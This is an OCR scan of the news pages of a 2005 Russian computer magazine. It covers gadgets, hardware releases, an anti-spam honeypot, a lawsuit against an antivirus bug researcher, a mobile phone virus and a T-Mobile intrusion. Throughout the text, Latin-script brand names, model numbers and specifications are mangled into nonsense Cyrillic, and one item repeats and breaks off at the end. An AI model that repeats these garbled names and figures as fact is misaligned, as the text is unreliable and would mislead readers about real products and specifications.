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Положить десяток противни- 
ков, играя в Мортал Комбат? 
Легко! Я и двадцатерых вы- 
несу - дай мне только волю. В 
реальной же жизни можно 
хорошенько получить по 
ушам всего от одного па- 
ренька, которому не понра- 
вилось, что ты громко разго- 
вариваешь в кинозале. 

За доли секунды успеть при- 
целиться в хаотично движу- 
щегося врага, находящегося 
в двухстах метрах при 
Тоѵ=130, и точно в него по- 
пасть из рейла? Да не проб- 
лема! А если останутся хел- 
сы, я его чайником добью, он 
не успеет даже повернуться. 
А вот прострелить подкинутую 
пивную банку из настоящей 
воздушки - это простите- из- 
вининте. Не смогу. 

При скорости 200 миль в час 
не наложить в штаны и успе- 
вать вовремя поворачивать, 
не сбив ни единого пешехода 
и не сосчитав все столбы, за- 
пускаю ЫР5 и радуюсь своим 
умениям. Но когда разго- 
няюсь на отцовской тойоте до 
150 километров в час, нога 
сама отпускает педаль газа и 
нервно подергивается, а руки 
начинают сжимать руль дав- 
лением в 19 атмосфер, как 
челюсти бультерьера. 

Все, чего мне волею судеб не 
дано в настоящей, взаправ- 
дашней жизни, все это я могу 
попробовать осуществить, 
сидя за компьютером, и полу- 
чить почти те же эмоции и 
ощущения. А людям с ограни- 
ченными возможностями 
компьютер вообще помогает 
сделать то, что им и не сни- 
лось. Открывает для них но- 
вые возможности хоть как-то 
реализовать себя в жизни. 

И знаешь, я безумно счастлив, 
что в свое время у человечест- 
ва появилась такая вещь, как 
ЭВМ, и не представляю, что бы 
мы сейчас без нее делали. 

ЬООЫік, 

не главный редактор X 
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красная кнопка 



НІТЕСН 




В распространенном компанией 
Ерзоп пресс-релизе сообщается 
о выпуске нового цветного лазерно- 
го принтера АсиЬазег С1 1 00. Новин- 
ка уже появилась в продаже, причем 



рекомендованная производителем 
цена составляет $500. Основные 
характеристики новинки: 

А Скорость печати: 5 цветных или 25 черно-белых 
страниц в минуту 

а Поддерживаемая плотность бумаги: от 64 до 210 г/кв. м 
^ Ручная двусторонняя печать 
л Поддерживаемые интерфейсы: 115В 2.0 и ІЕЕЕ 1284 
а Софт в поставке: М2Раде, ОИісе Кеабу 
Еззепііаіз 

Помимо С1100, есть также и сете- 
вая версия АсиЬазег, которая носит 
название С1100ІМ и отличается от 
младшего брата добавленным сете- 
вым модулем Ерзоп № 
ІО/ІООВазеТ. к 



музыкальная РЕЗинко 



НІТЕСН 



Н еизвестная японская компания вы- 
пустила гаджет, симулирующий ра- 
боту красной кнопки ядерного чемодан- 
чика. Контрольный пульт ЗеІТ-ОезІгисІ: 
ВиКоп йХ оборудован несколькими сте- 
пенями защиты: ключом, двумя тумбле- 
рами и, собственно, красной кнопкой 
под стеклом с изображением Веселого Роджера. Устройство подключает- 
ся к компьютеру по шине 115В 2.0. При срабатывании красной кнопки мир 
вокруг не летит в тартарары. Зато запускается программа, определенная 
при помощи специального софта. Мизі Ііаѵе для гика можно купить всего 
за 50 долларов. ■ 



П0В9ШКП 




З краинский ученый изобрел музыкальный презерватив. На обычную ре- 
зинку Григорий Чаусовский из Запорожья закрепил миниатюрный сен- 
сорный аппликатор. Проводки идут к динамикам. Стоит немного сжать 
презерватив или смочить его поверхность, как он начнет издавать весьма 
специфичные звуки. На практике, меняя ритм и глубину погружения «от- 
бойного молотка», можно здорово музицировать. При массовом произво- 
дстве стоимость такого презерватива не превысит стоимости звуковой 
открытки. Кондомы будут одноразовыми, а звуковое устройство можно ис- 
пользовать многократно. ■ 



РЕЗОК 08113 



ЖЕЛЕЗО 




М енеджеры компании АЗІІЗТеК 
официально объявили о выпус- 
ке внешнего ОѴО+В/ВѴѴ- резака 
5ОВѴѴ-0804Р-О. Новинка обеспечи- 
вает запись на ОѴР+П со ско- 
ростью 8х, ОѴР+П (РоиЫе Ьауег) - 
2,4х, ОѴР+РМ/ - 4х, СО-Н/СОШ - 
24х, при этом скорость чтения сос- 
тавляет 24х для СО- НОМ и 8х для 
ОѴО-НОМ. Для обеспечения высо- 
кой надежности и качества специа- 
листы АзизТек применили фирмен- 
ные технологии РІехІгаІ_іпк (предо- 
твращает ошибки, связанные с не- 
достаточной загрузкой буфера) и 
РІехігаЗреесІ (регулирует скорость 
вращения шпинделя для оптималь- 
ного качества записи). 



Привод поставляется в алюминие- 
вом корпусе, при этом весит 350 
грамм. Отдельным абзацем в 
пресс-релизе говорится, что 
50НѴѴ-0804Р-0 получил в Герма- 
нии награду ІР Резідп АѵѵагсІ 2005 
за выдающийся дизайн. Вот такти- 
ко-технические характеристики 
нового привода: 

а 8х 0ѴШ/2.4Х ВѴО+К (РоиЫе Еауег)/4х ШШІк 
0Ѵ0-К0М/24Х СШ4х С0-Ш/24Х СМОМ 
а Два высокоскоростных интерфейса: 

115В2.0 и ІЕЕЕ1394 
А Вес: 350 г 
^ Толщина: 18,7 мм 

а Используется технология РІехЕгаЫпк, которая 
позволяет избегать ошибок, возникающих из-за 
неполной загрузки буфера 
а Также применяется технология ЕІехЕгаЗрееб, 
которая выбирает оптимальную скорость записи 
а Автоматическое определение деформации диска 
^ Утилита автоматического обновления прошив- 
ки АЗІІ5 

а Поддерживаемые системы: ѴѴілсІоѵѵз 
ХР/2000/9х и Мае 05 

а Поддерживаемые форматы: Ш-КІШІШ, 
ѴШІМ, ОѴР-Ѵібео, СР-РА, СР-КОМ, СНОМ ХА, 
РІіоЕо СО, Міхеб Мобе СР-КОМ, СО-І, СР-Ехіга, СО- 
ТехЕ, Ѵібео СО, РѴСР и ВооЕаЫе СР 



ДЛЯ СПРИЕРР 



ВЗЛОМ 



В Сети какая только живность не во- 
дится. Черви, трояны, хакеры, ламе- 
ры... Есть в Сети и такие жучки, которые 
пролезают во все щели, ищут емейлы и 
передают их куда следует. В миру их на- 
зывают спамботами, и служат они, 
собственно, для составления спам-лис- 
тов. Оставляешь ты на каком-нибудь сай- 
те знакомств обратный адресок, а вместо 
признаний в любви и заманчивых пред- 
ложений на следующий день приходят 
предложения увеличить пенис или поду- 
чить английский. Ребята из антиспамерс- 
кого проекта НопеуроІ решили, что пора 
бы проучить авторов спамботов, и приду- 
мали специальные ловушки. Когда бот 
заходит на сайт и собирает мыльники, он 
попадает на специально сгенерирован- 
ную страницу с контрольным адресом 
емейла. При этом регистрируется ІР, дата и время посещения. Специаль- 
ный скрипт отмечает все мессаги, которые приходят на контрольный адрес, 
что позволяет выявить спамботов. После этого ІР заносится в блэк-лист и 
доступ с него на сайт блокируется. На сайте НопеуроЕ ведется статистика, 
где дана всевозможная информация о зарегистрированных спамерских бо- 
тах. Подобную ловушку каждый может установить на своем сайте, если за- 
регистрируется в системе. Только за первую неделю к проекту присоедини- 
лось более тысячи сайтов, теперь их количество трудно сосчитать. К этому 
моменту авторы Нопеуроі выявили огромное количество спамботов и ІР-ад- 
ресов, по которым можно вычислить спамеров. Помимо чисто технической 
ловушки, ребята из Нопеуроі установили ловушку юридическую. На конт- 
рольной страничке, куда пролезает спамбот, содержится сообщение, что 
при этом автор спамбота согласен выплатить по $50 компенсации за каж- 
дое письмо, отправленное на собранные ящики. А также согласен приехать 
в местный суд, куда его вызовет владелец сайта. ■ 
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тч собирпется осудить своего Фоною ропики-внедорожники 



С тарая добрая компания Арріе не собирается уходить с компьютерного рынка, а наобо- 
рот, с каждый годом расширяет сферы влияния. Так, в скором времени планируется 
выпустить новый бюджетный компьютер Мае Міпі, стоящий всего $499, а также новый іРосІ 
на флешке. Арріе возлагает большие надежды на эти безделушки и считает, что они сильно 
укрепят ее позиции на рынке. Ясное дело, до релиза вся инфа держалась секрете. Но како- 
во было удивление сотрудников компании, когда они увидели, что все подробности о новин- 
ках широко обсуждаются в прессе. Небольшое внутреннее рассле- 
дование выявило, что первоисточником инфы стал фан-сайт Арріе 
ѵѵш.Шпкзесгеі.соп, автором которого является 19-летний с 
Гарварда Николас Чиарелли. На вопрос, откуда тот взял ин- 
фу, парень сослался на анонимные источники компании. 

Скидку на то, что Никки студент и денег у него с гулькин 
нос, Арріе делать не стала и подала в суд. Негоже, мол, кон- 
фиденциальную инфу разбазаривать. Сейчас Никки пытает- 
ся найти бесплатного адвоката, так как на нормального у не- 
го бабок нет, а юристы Арріе готовят необходимые докумен- 
ты, чтобы засудить парня на пару миллионов, і 





Р мериканская компания І_апсІВоІІег (ѵшѵѵ.іапгігоііег.сот) 
представила внедорожные ролики. Гордость 
конструкции - два укрупненных колеса, которые закреп- 
лены сбоку под особым углом наклона. Ось подошвы про- 
ходит по диагонали, а точки соприкосновения с поверх- 
ностью находятся практически по центру. Это, во-первых, 
обеспечивает простоту обучения катанию. Во-вторых, по- 
вышается маневренность и снижается опасность борто- 
вой качки. В роликах-внедорожниках можно дальше ука- 
титься по инерции и проще затормозить. Сменные пнев- 
матические шины с уретановым покрытием смягчают 
толчки и позволяют двигаться не проходимыми доселе 
тропами. Ролики отлично ведут себя на выбоинах и по- 
верхностях, сравнимых с гладильной доской. Прототип 
І_апсІВоІІег засветился на съемках фильма «Вокруг света 
за 80 дней» с Джеки Чаном. В продажу ролики поступили 
только что по цене 249 долларов. ■ 




ЕВВВДШ Шй 



ЫѴГОІА® ТигЬоСаоНе™ ІесОпоІоду 
ЫѴЮІА® СеРогсе™ 6200 ѵѵііГі ТіігЬоСасІіе™ 
Оп-СЫр Ѵісіео Ргосеззог 
РСІ Ехргезз 



купи продукцию 
и выиграй ХВОХ 



НеасЩиаііегз 

РКОиМК МІСР05Ѵ5ТЕМ5 СОРР. 

6Р,ІЧо. 349, Ѵапд-Киапд 51, 

Меі-Ни,Таіреі,Таі\л/ап 

ТеІ: 886-2-26591588, 26593166 

Рах: 886-2-26591599 

Гійр://ѵѵѵѵѵѵ.ргоІіпк.соппЛѵѵ 

Е-таіІ: ргоІіпк@5егѵ.ргоІіпк.сот.І\л/ 



КПр://ѵѵѵѵѵѵ.ріхеІѵіеѵѵ.ги 



ѵтѵѵ.ріхеіѵіеѵлш 



ѵѵшн 



«еікр 

ЕІ_КО Сгоир 

ТЕІ-: 095-234-9439/812-118-6222 
РАХ: 095-234-2845/812-118-6222 



Ж 

І_апсІтагк Тгасііпд Іпс. 

ТЕІ_: 095-913-96-81 
РАХ: 095-913-96-81 



Тгіпііу Еіесігопісз Согр. 

ТЕІ_: 095-737-8046 
РАХ: 095-231-2659 



• ІЧѴЮІА® СіпеРХ™ 3.0 ТесЬпоІоду 

• ІЧѴЮІА® ШгаЗИасІоѵѵ™ II ТесНпоІоду 

• Оп-СЫр Ѵісіео Ргосеззог 

• АСР-8Х 



Сгеаііпд А Ыеѵ/ Ѵізіоп ! 



- ІЧѴЮІА® СіпеРХ™ 3.0 ТесИпоІоду 

• ІЧѴЮІА® Шга5РюсІо\Ѵ™ II ТесГіпоІоду 

• МісгозоШВ) ОігесіХ® 9.0 ЗГюсІег МосІеІ 
3.0 $црроі1 

• Оп-СІпір Ѵісіео Ргосеззог 

• РСІ Ехргезз 
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ПППТЫ-СЕРЕДНЯЧКИ 



ЖЕЛЕЗО 



Т ы наверняка хорошо знаком с тайваньской компанией ЕРоХ - эти парни преж- 
де всего известны своими недорогими середнячковыми материнскими пла- 
тами. Недавно они начали производить новые платы ЕР-5РО/У и ЕР-5Р1Д бази- 
рующиеся на основе логики ІпіеІ І865РЕ и ІпіеІ І848Р. У обеих материнских плат 
системная шина работает на частоте 800 МГц, реализована поддержка АСР 8х, 
ООН 400, ЗегіаІАТА и прочего стандартного барахла. Интереснее тот факт, что обе 
платы оснащены разъемом І_ОА 775. Также новые платы оборудованы интегриро- 
ванными звуковыми адаптерами и сетевушками (1С у ЗРРАЗ и 100М у 5Р1АТ) 
Краткие сравнительные характеристики плат: 

л Используемый чипсет: Іпіеі І865РЕ 
л Поддерживаемые процессоры: Репііит 4, Сеіегоп 
^ Слоты расширения: 5 РСІ, А6Р 8х 

а Память: 4 РС3200 (46 максимум) у 8Р0АЗ и 2 таких же разъема у 8РІ.АТ 

а Интегрированные устройства: звук АІ.С655, гигабитный сетевой адаптер у 5Р0АТ ІООшЬрз - у ЗРЬАТ 

а 8 портов 1)$В, форм-срактор РиІІАТХ, ЗегіаІАТА, 8Р0ІР, интегрированный модуль диагностики неисправностей 




НОЕВ КОВЧЕГ 




К омпания 115 Випкегз 
(шѵу.изЬипкегз.сот) раз- 
работала мобильный бун- 
кер, обеспечивающий па- 
раноидальную защиту от 
катаклизмов. Неполный 
список опасностей, кото- 
рым он может противосто- 
ять, включает в себя урага- 
ны, торнадо, наводнения, 
цунами, пожары, бураны, 
военные действия и атаки террористов. Бункер выпускается в трех моде- 
лях: наземной, подземной и подводной. Обтекаемая форма тарелки поз- 
воляет противостоять ураганному ветру (до 800 км/ч) и выдерживать 
экстремально высокое давление под водой. Монолитная конструкция из 
бронебойной стали и стекловолокна лишена уязвимых мест: в ней нет 
швов и соединительных узлов. По периметру бункера проходит бетонное 
кольцо - такие используются в укреплениях Пентагона. Толщина стен дос- 
тигает 20 сантиметров, что позволяет бункеру выдерживать нагрузку до 
65-100 тонн. Срок эксплуатации конструкции измеряется веками. Внутри 
нет ни одного угла, чтобы предотвратить переломы и ушибы. Полезная 
площадь составляет 30 квадратных метров. На ней комфортно размеща- 
ются до 6 взрослых людей. При этом в центральной комнате можно нахо- 
диться в полный рост. Мобильный бункер опционально комплектуется ав- 
тономной электростанцией, солнечными панелями, системой вентиляции, 
отопления и водоочистки, комплексом наружного наблюдения и интерне- 
том через спутник. Вес бункера - от 13 до 18 тонн, в зависимости от комп- 
лектации. Для его транспортировки используются грузовики и вертолеты. 
Если потребуется, бункер сбросят на парашюте с точностью приземления 
плюс-минус 40 метров. Стоимость бронированного «Ноева ковчега» начи- 
нается от 30 тысяч долларов. ■ 



обнаружил уязвимость? 

В ТЮРЬМУ ПОЖАЛУЙТЕ 



взпои 



В олну возмущения поднял в зесигііу-сообществе случай, который произо- 
шел во Франции. Независимый зесигііу-исследователь Гийом Тина обна- 
ружил кучу багов во французском антивирусе ѴідиагсІ. Дядя Тина - парень не 
жадный, поделился своими находками со всем миром. Но щедрость Гийома 
авторы ѴідиагсІ ’а не оценили. И, заявив, что он нарушил закон об интеллекту- 
альной собственности, подали на человека в суд. Слушанье по делу незадач- 
ливого секурити-эксперта, работающего нынче в Гарварде, началось 4 янва- 
ря. Антивирусная компания требует посадить дядю Тина как минимум на 4 
месяца и заплатить им 1 ,2 миллиона долларов в качестве компенсации. Сам 
Тин себя виновным не признает, считая, что его исследования только показа- 
ли, насколько ненадежен антивирус и насколько не соответствуют истине 
рекламные слова «Распознает и блокирует 100% известных вирей». По его 
мнению, если независимым исследователям запретить публиковать инфу о 
новых багах, то надежность софта можно будет оценивать лишь по сопутству- 
ющим буклетикам. Компания ОЖ ЗесигИу, которая сейчас судится с Гийо- 
мом, утверждает, что критические уязвимости нельзя выкладывать в Сеть без 
разрешения авторов продукта. Итоги этой катавасии будут известны 8 марта, 
когда состоится окончательное слушание. Буду держать тебя в курсе. ■ 
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Записывайте, храните, просматривайте 
фотографии и слушайте музыкальные 
материалы с Есхііоп УпіѵегваІ РК 13 
на базе процессора Іпсеі® РепТіипп® 4 
е технологией НТ. И используйте 
цифровой мультимедиа адаптер для 
подключения к телевизору или 
стереосистеме в любой комнате Вашего 
дома. Это новый мир возможностей. 



Откройте для себя новый мир 
цифровых увлечений. 







поющая собоко 



НІТЕСН 



Я понская компания Беда 
Тоуз («ига.і(1од-$едаІоу$.соп) 

анонсировала выпуск музы- 
кальной собаки ібод. Робо- 
пес не только исполняет по- 
пулярные композиции и 
сопровождает их цветому- 
зыкой светодиодов, но со- 
чиняет собственные мело- 
дии. А еще пританцовывает и виляет хвостиком. Робопес обладает замеча- 
тельным музыкальным слухом. Достаточно провести рукой у пластмассового 
носа, чтобы ібод сменил пластинку. По интеллекту роботу далеко до АІВО. Но 
игривости и дружелюбности ібод не занимать. Игрушка поступит в продажу в 
апреле по цене около 400 долларов. ■ 




ЗПНЯТНОЕ ИССЛЕДОВАНИЕ 
КОМПЬЮТЕРНЫХ СТУДЕНТОВ 



ВЗЛОМ 



Н а Украине пытливые умы провели занятное исследование среди студен- 
тов 1-4 курсов компьютерных специальностей. Вопросы задавались про 
отношение к понятию «хакер», про отношение к статьям в инете на тему взло- 
ма компьютерных сетей, про мотивы изучения технологий взлома, про уро- 
вень технических знаний. Результаты оказались не менее занятными, чем оп- 
рос. Например студенты специальностей, где изучают защиту информации, к 
хакерам относятся вполне нейтрально и где-то даже положительно, в то вре- 
мя как на специальностях, где учат эксплуатации техники, народ о хакерах от- 
зывается с неодобрением и где-то даже злостью. Многие считают, что хакер 
- это не злодей какой-нибудь, а грамотный специалист, который борется за 
справедливость и с которого можно взять пример. Более углубленное изуче- 
ние представителей специальности защиты информации выявило, что 38% из 
них изучают методики взлома для построения эффективной защиты, 17% - 
для того, чтобы зарабатывать на взломе. А 1 3% готовы преступить компью- 
терные законы, если нужно отомстить какой-то сволочи. 

Многие теперь стремятся изучать технологии взлома банковских систем, что 
не может не настораживать. Из всего этого можно сделать вывод, что парни 
на Украине времени не теряют и впитывают методики взлома, чтобы потом их 
применить во всей красе с пользой для кошелька. И даже не стесняются со- 
общить об этом заранее. ■ 




ЮНСНОПН С0И1Н0 
80011! ПОЧТИ 800И 

С тали известны некоторые 
подробности относитель- 
но ѴѴіпбоѵѵз І_опдІіогп. Как 
известно, выход нового маз- 
дая неоднократно переноси- 
ли, наворачивая его все 
больше и больше. Наконец 
МісгозоЙ решила ускорить 
процесс, отказавшись от не- 
которых не самых нужных 
функций - файловой систе- 
мы ѴѴіпРЗ, например. Благо- 
даря этому бета-тестирование ОС состоится не в 2010 году, как это могло 
быть, а уже в мае этого года. К этому времени будут готовы все основные ком- 
поненты системы. Еще год потребуется, чтобы довести маздайхорн до ума, 
насколько это возможно, и окончательный релиз состоится во второй полови- 
не 2006 года. На страничке ѵѵѵт.ѵѵіп$ирег$і1е.сот/$Еіоѵѵса$е/ІопдЕіогп_ргеѵіеж_2005.а$р 
можно посмотреть подробное расписание всех работ и узнать о разновиднос- 
тях системы. Всего будет семь разных видов І_опдЕіогп’а: ЗЕабег Ебіііоп, Ноте 
ЕбШоп, Ргетіит/Мебіа СепЕег Ебіііоп, РгоТеззіопаІ ЕбШоп, ЗтаІІ Визіпезз 
ЕбШоп, МоЬіІіІуДаЫеі РС ЕбШоп и ІІЬег ЕбШоп. Та, что «Убер», будет включать 
в себя возможности всех остальных эдишнов. Ждем-с. 



ВЗЛОМ 




ВИРУСЫ НП ИОБИПЬНИКОК 

развиваются 



взлом 



Т о, что на мобильных телефонах появятся 
вирусы, стало понятно давно. Одним из 
первых был вирус СаЬіг, который стал зара- 
жать российские телефоны на платформе 
ЗутЬіап еще в ноябре 2004 года. Недавно ста- 
ло известно о появлении нового виря Ьазсо.А. 

В отличие от своего предшественника, расп- 
ространяется он двумя способами, чего среди 
мобильных вирей еще не бывало. Елзсо цепля- 
ется к файлам любых приложений и, как толь- 
ко юзер пытается его запустить, прочно оседа- 
ет внутри телефона. Понятное дело, если чу- 
вак решит поделиться файликом с друганами, все они получат заодно и вирь. 
Помимо этого, вирус, подобно компьютерным червям, пытается распростра- 
нить себя без постороннего вмешательства. Через ЫиеЕооЕІі он ищет находя- 
щиеся рядом блутус-девайсы и, если в радиусе передачи появляется другой 
аппарат, тут же копирует себя на него. Пока мобильные вирусы не причиняют 
особого вреда. Разве что батарея садится быстрее из-за активного использо- 
вания блутуса. Но, как говорится, из искры разгорится пламя. А пока антиви- 
русники во главе с Касперским рекомендуют выключать блутус и прочие наво- 
роты от греха подальше. ■ 




8 





цифровая райка 



НІТЕСН 




Р мериканская компания 
СЕІѴА (м.сеіѵа.сот) 

представила рамку для циф- 
ровых фотографий. Снимки 
на нее можно пересылать по 
интернету и непосредственно 
с мобильников со встроенной 
камерой. По сути, Рідііаі 
РИоІо Песеіѵег - это цветной 
Юй-экран 13x18 сантимет- 
ров, заключенный в сменную 
рамку. Матрица экрана имеет высо- 
кое разрешение, и качество картинки заслуживает 
всяческих похвал. Для приема снимков устройство подключается к обычной 
телефонной линии и дозванивается на местный номер сервисной службы. 
За раз можно загрузить до 30 фотографий, которые будут сменять друг дру- 
га в слайд-шоу. Добавлять новые снимки могут друзья и родственники по 
всему свету. Для этого владелец рамки должен выдать им права доступа. 
После того как фотография загружена на сайт, она в любой момент может 
появиться в рамке на столе или на стене. Независимо от исходного разме- 
ра, снимки будут отмасштабированы. Фотографии могут сопровождаться 
подписями. На 2005 год компания запланировала выпуск новых моделей ра- 
мок с поддержкой интернет-соединения и беспроводного ѴѴі-Рі. В другом 
варианте устройство будет поставляться с кардридером, поддерживающим 
большинство существующих форматов. Оідііаі РИоІо Песеіѵег можно приоб- 
рести по цене 1 50 долларов. ■ 



винт для 

БЭКОПО 



ЖЕЛЕЗО 



Н овый девайс для 
бэкапа данных 
представила недавно 
компания ІООЕАН. Но- 
винка называется весь- 
ма фантасмагорично: 
СотЬо Тгі-Зеіес! ЮИ 
Ргіѵе и представляет 
собой 3,5-дюймовое 
внешнее устройство, 
которое сочетает в се- 
бе функциональность 
внешнего портативно- 
го винчестера и полно- 
ценной системы хране- 
ния данных. В новинке 
используется техноло- 
гия Тгі-5еІес{, реализу- 
ющая автоматический 
бэкап с использовани- 
ем пользовательских 
настроек. Выбор ис- 
пользуемого профиля 
и запуск процесса ко- 
пирования информа- 
ции реализуются при 
помощи специальной 
красивой кнопки на 



корпусе устройства. 
ЮМ Ргіѵе оснащен ин- 
терфейсами РігеѴѴіге 
400 и 115В 2.0, стало 
быть, теоретически 
скорость передачи 
данных может дости- 
гать 480 Мбит/с - при 
подключении по 115В. 
Кстати, интересно, по 
какой причине инжене- 
ры компании решили 
использовать интер- 
фейс РігеѴѴіге 400, а не 
более популярный 
РігеѴѴіге 800, который 
применяется в ряде 



других моделей. Что 
касается емкости уст- 
ройств, то она опреде- 
ляется установленным 
внутрь жестким диском 
(пользователь сам мо- 
жет менять накопители) 
и варьируется от 80 до 
250 Гб. При этом ком- 
пания предлагает и 
корпуса для установки 
дополнительных жест- 
ких дисков. Габариты 
корпуса составляют 
19,05x17,15x8,26 см, 
вес - 1 ,8 кг. ■ 




КОКЕР похпкпп 

охотника за какЕРаии 

К огда 10 лет назад Кевин Митник 
похакал секурити -эксперта Цу- 
тому Шимомуру, об этом писали 
чуть ли не все газеты. Теперь подоб- 
ные вещи не в диковинку. Например 
в Калифорнии некий программер по 
имени Николас Ли Якобсен хакнул 
коммерческую сетку Т-МоЬіІе ІІ5А и 
семь месяцев развлекал себя чтени- 
ем электронных писем и просмот- 
ром личных файлов юзеров. Среди 
других хакнутых персон оказался и 
агент секретной службы по борьбе с 
хакерами. И пока охотник за хакера- 
ми охотился на других, хакер, в 
свою очередь, наблюдал за ним. На- 
конец сотрудники секретной службы 
незваного гостя попалили и взяли с 



збо градусов 



НІТЕСН 



В бразильском городе Куритиба возвели уникальное здание с вращаю- 
щимися этажами. В башне 5иі1е ѴоІІагсІ 1 1 этажей и столько же квар- 
тир на 1 1 хозяев. Круглые квартиры окружены балконами с окнами из 
пластика от пола до потолка. Зеркальные стекла образуют мозаику с се- 
ребряным, бронзовым, зеленым и синим отливами. Центральная часть 
здания не вращается. В ней расположен лифт, кухня, прачечная, санузел 
и спальная для прислуги. Каждая квартира оборудована независимой сис- 
темой двигателей и вращается индивидуально. Для управления использу- 
ется пульт на стене. Он понимает голосовые команды и позволяет запрог- 
раммировать движение во времени. Например, квартира может следовать 
в аккурат за солнцем. Полный поворот на 360 градусов занимает не мень- 
ше часа - чтобы голова не закружилась. Конструкция башни выполнена из 
металла и винила. Благодаря отсутствию каменной кладки поворот осуще- 
ствляется абсолютно бесшумно. Квартирка в хай-тек здании стоит около 
300 тысяч баксов. ■ 




поличным. Теперь Коле предстоит 
долгое судебное разбирательство, а 
пока его отпустили под залог 25 ты- 
сяч долларов. Облажавшемуся анти- 
хакеру в то же время запретили 
юзать в рабочих целях ноутбук, 
взломанный Якобсеном. На всякий 
случай. ■ 
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ХПКЕР/№02(74)/2005 




РОКЕТЫ 

пожоют из-за 

программных Багов 



ВЗЛОМ 



Е сть в американском штате Аляска 
военная база, в которой работают 
военные люди и совершаются воен- 
ные эксперименты. Один из таких 
экспериментов как раз проводили не- 
давно. Вояки запустили учебную ра- 
кету и с помощью другой ракеты-пе- 
рехватчика, стартовавшей с неболь- 
шого островка в Атлантическом океа- 
не, вознамерились ее сбить. Но что- 
то пошло не так, и ракета-перехват- 
чик не взлетела. Как оказалось, прои- 
зошло это в результате незначитель- 
ного программного бага в системе 
коммуникации между ракетой и цент- 
ральным компьютером управления 
полетами. Система обнаружила, что 
информации недостаточно, и реши- 
ла, что лучше подобру-поздорову 
отключиться. В Пентагоне быстро по- 
няли, что с ракетами шутки плохи, и 
выделили дополнительные деньги на 
увеличение надежности системы. 
Следующие испытания пройдут в се- 
редине февраля, при этом запуск ра- 
кет-перехватчиков будет вестись из 
подземных шахт в Аляске и Калифор- 
нии. Правительство США считает, что 
стабильная противоракетная оборона 
особенно важна, учитывая то, что на 
Америку в любой момент может на- 
пасть Северная Корея. Почему она 
может напасть, правительство, впро- 
чем, не уточнило. ■ 





ЖЕЛЕЗО 



5 МП ОТ N1 



Н овую 5 мегапиксельную цифровую 
мыльницу Е50 представила компа- 
ния Копіса МіпоНа. Новая камера облада- 
ет Зх оптическим и 4х цифровым зумом, 
оборудована 2,5” ЖК-дисплеем и умеет 
записывать видеоролики длительностью 
до 30 секунд. Камера поддерживает ин- 
терфейс 115В 1 .1 и использует карты па- 
мяти Весите йідііаі. Во время съемки 
пользователь может использовать 10-се- 
куццный таймер и встроенную вспышку, 
которая имеет 3 режима работы: Аиіо, 
РесІ-Еуе-РесІисйоп и РіІІ-іп. Размеры но- 
винки составляют 88,5x24x54,5 мм. н 



МУЛЬТИМЕДИЙНЫЙ КОМЕЛЬ 



ЖЕЛЕЗО 



К омпания АІѴЮ недавно представи- 
ла новый процессор для мульти- 
медийных устройств, АМР АІсІтету 
Аиі 200. Новинка отличается, прежде 
всего, пониженным энергопотребле- 
нием и оптимизирована для исполь- 
зования в портативных медиаплеерах. 
Предполагается, что кристалл найдет 
широкое применение в бытовой 
электронике, поскольку он предлагает 
разработчикам кучу новых возмож- 
ностей: передачу видеокартинки нап- 
рямую с видеорекордеров, поддержку 
дисплеев с ШО- качеством. Но основ- 
ной упор представители АІѴЮ делают 
на пониженное энергопотребление, 
что делает новый кристалл очень 
привлекательным для использования 
в портативных устройствах. Основные 
возможности АІѴЮ АІсІтету Аиі 200 
выглядят так: 

л Ядро: МІР332 (поддерживаемые частоты 333, 400, 
500 МГц), 32-разрядная архитектура, 16-килобайтный 



кэш инструкций, кэш данных такого же объема 
л Энергопотребление: менее 400 мВт при работе на 
частоте 400 МГц 

А Поддержка ОѴО-видео (разрешение 720x480) с 
возможностью масштабирования до 1024x768 
А Интерфейс памяти ШІШ2 ЗОВАМ 
л Поддержка 0Ш с напряжением питания 2,5 или 
1,8 В, с тактовыми частотами до 500 МГц, 16/32 - 
разрядная шина данных, емкость до 512 Мб 
а Встроенный аппаратный ускоритель работы с ме- 
диапотоками позволяет отказаться от использова- 
ния дополнительных микросхем для работы с видео 
л Поддержка МРЕ61, 2,4, ѴИМѴ9, МРЕ62(4): 
720х480@30Грз, ѴѴМѴ9 :720х480@30Грз, 2МЬрз 
а 115В 2.0 хост-контроллер 
а Интерфейс для подключения цифровых камер, а 
также устройств с возможностью доступа в интернет 
А Шина данных, 8-10 бит 
А Вход данных - ССІК 656 
А Поддержка СМ05/СС0-матриц 
^Аппаратная поддержка шифрования АЕ5-128 

Ш АІсІіешу Аи1200 начнет поставляться во втором 
квартале 2005 года, причем цена самой младшей 
модели в партиях от 10 тыс. шт. составит 22,5 дол- 
лара. Так что уже скоро будут появляться устрой- 
ства на базе этого кристалла. ■ 



ИНТЕРПКТИВНРЯ 




К омпания І_еарРгод 
(м.Іеар(год.сот) предс- 
тавила интерактивную ручку 
РІ_Ѵ. Используя технологии 
оптического сканирования 
от компании АпоТо, новинка 
позволяет невероятное - 
взаимодействовать с кар- 
тинкой на бумаге. Так, мож- 
но нарисовать произволь- 
ный калькулятор и нажимать 
его виртуальные кнопки. Ручка будет проговаривать каждое нажатие, а в кон- 
це озвучит результат арифметического действия через встроенный динамик. 
Приноровившись, можно сыграть собачий вальс на клавишах нарисованного 
пианино. Помимо других функциональных приложений, вроде блокнота и ин- 
терактивного дневника, в комплект входит игра «виселица» и несколько сти- 
керов, которые оживают, если их коснуться. Интерактивная ручка РІ_Ѵ посту- 
пит в продажу летом этого года по цене всего 99 долларов. ■ 
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і дюйм = 6 ГБ музыкальная 

н «РЕЗИНКП» 



Ѵ езіегп ОідііаІ решила завоевывать 
бурно развивающийся рынок ми- 
ниатюрных 1 ” винчестеров. При этом 
мотивация компании весьма понятная: 
за 2004 год продажи этих устройств 
выросли в 8 раз и по оценкам специа- 
листов, в 2005 году рынок поглотит 
примерно 20 миллионов таких уст- 
ройств. Это уже неплохие объемы. 
Откуда такая потребность? Новые дис- 
ки планируется использовать в фото и 
видеокамерах, плрЗ плеерах, КПК и со- 
товых телефонах. Ведь они по разме- 
рам чуть больше флэшки, а емкость 



и главное - стоимость у них значитель- 
но привлекательнее. Планируется, что 
новые диски от Ѵ\Ю поступят на рынок 
во втором квартале 2005 года. Новинки 
будут выпускаться в форм-факторе СР 
II, скорость вращения шпинделя соста- 
вит 3600 ВРМ, а ёмкость - 6Гб. При 
этом производитель обещает обеспе- 
чить время доступа 1 2 мс и применить 
в производстве этих накопителей все 
свои фирменные разработки, включая 
антишоковую и энергосберегающую 
технологии.. ■ 




З краинский ученый изобрел музыкальный презерватив. На обычную 
«резинку» Григорий Чаусовский из Запорожья закрепил миниатюрный 
